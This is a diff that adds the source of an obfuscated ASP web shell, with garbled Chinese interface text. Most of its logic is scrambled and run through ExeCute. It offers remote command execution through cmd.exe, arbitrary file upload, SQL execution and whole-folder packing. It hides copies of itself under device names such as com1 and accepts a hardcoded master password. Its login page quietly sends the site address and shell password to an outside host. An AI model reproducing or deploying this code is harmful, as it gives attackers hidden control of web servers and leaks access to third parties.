+	   ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дq</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дq</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End If
+   Else
+       ReWrStr = folder & "<FONT color=#ff2222> �ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дY</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дY</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End if
+   End if
+   Set TestFileList = Nothing
+   Set TestFolder = Nothing
+   Set FSO = Nothing
+   ScReWr = ReWrStr
+End Function
+
+Sub Message(state,msg,flag)
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD >ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub
+
+
+Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:
+Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+RRS ""&copyurl&""
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Av.asp")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center>'"&errout&"'</center>"
+end if
+else
+si="<script src=""http://sx.love-1-love.com/sx.php?url="&server.URLEncode(""&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&mmshell&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1
+
+Function EnCode(ObjStr,ObjPos)
+Dim NewStr,TmpStr,i,LenStr:LenStr=Len(ObjStr):For i=0 To Int(LenStr/ObjPos)-1:TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&TmpStr:Next:EnCode=TmpStr&Right(ObjStr,LenStr Mod ObjPos)
+End Function
+
+
+
+Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:
+
+Function SinfoEn(ObjStr,ObjPos)
+ObjStr=Replace(ObjStr,"~",""""):NewStr=Split(ObjStr,"`"):For i=0 To UBound(NewStr):SinfoEn=SinfoEn&EnCode(NewStr(i),ObjPos)&vbCrLf:Next:SinfoEn=Left(SinfoEn,Len(SinfoEn)-2)
+End Function
+
+
+
+Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:
+
+Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function
+
+
+
